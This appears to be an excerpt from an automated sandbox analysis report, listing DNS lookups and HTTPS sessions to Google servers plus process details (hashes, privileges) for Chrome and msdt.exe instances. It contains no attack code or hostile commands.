Sep 2, 2022 13:47:43.113212109 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:44:45.275023937 CEST | 52239 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:45.278227091 CEST | 56807 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:45.295929909 CEST | 53 | 56807 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:44:45.301316977 CEST | 53 | 52239 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:44:47.649152040 CEST | 59444 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:47.669023037 CEST | 53 | 59444 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:44:47.771469116 CEST | 64906 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:47.789319038 CEST | 53 | 64906 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:45:48.566984892 CEST | 63001 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:45:48.587142944 CEST | 53 | 63001 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:45:48.815646887 CEST | 65133 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:45:48.835638046 CEST | 53 | 65133 | 8.8.8.8 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 2, 2022 13:44:45.275023937 CEST | 192.168.2.4 | 8.8.8.8 | 0x32c7 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:44:45.278227091 CEST | 192.168.2.4 | 8.8.8.8 | 0x958d | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:44:47.649152040 CEST | 192.168.2.4 | 8.8.8.8 | 0x4111 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:44:47.771469116 CEST | 192.168.2.4 | 8.8.8.8 | 0xbc9c | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:45:48.566984892 CEST | 192.168.2.4 | 8.8.8.8 | 0x5c52 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:45:48.815646887 CEST | 192.168.2.4 | 8.8.8.8 | 0xe61c | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 2, 2022 13:44:45.295929909 CEST | 8.8.8.8 | 192.168.2.4 | 0x958d | No error (0) | 216.58.215.237 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:44:45.301316977 CEST | 8.8.8.8 | 192.168.2.4 | 0x32c7 | No error (0) | clients.l.google.com | CNAME (Canonical name) | IN (0x0001) | ||
Sep 2, 2022 13:44:45.301316977 CEST | 8.8.8.8 | 192.168.2.4 | 0x32c7 | No error (0) | 172.217.168.78 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:44:47.669023037 CEST | 8.8.8.8 | 192.168.2.4 | 0x4111 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:44:47.789319038 CEST | 8.8.8.8 | 192.168.2.4 | 0xbc9c | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:45:48.587142944 CEST | 8.8.8.8 | 192.168.2.4 | 0x5c52 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:45:48.835638046 CEST | 8.8.8.8 | 192.168.2.4 | 0xe61c | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49738 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:44:46 UTC | 0 | OUT | |
2022-09-02 11:44:46 UTC | 1 | IN | |
2022-09-02 11:44:46 UTC | 2 | IN | |
2022-09-02 11:44:46 UTC | 2 | IN | |
2022-09-02 11:44:46 UTC | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.4 | 49737 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:44:46 UTC | 0 | OUT | |
2022-09-02 11:44:46 UTC | 1 | OUT | |
2022-09-02 11:44:46 UTC | 2 | IN | |
2022-09-02 11:44:46 UTC | 4 | IN | |
2022-09-02 11:44:46 UTC | 4 | IN |
Target ID: | 0 |
Start time: | 13:44:39 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 1 |
Start time: | 13:44:42 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 2 |
Start time: | 13:44:43 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 5 |
Start time: | 13:45:14 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ef550000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |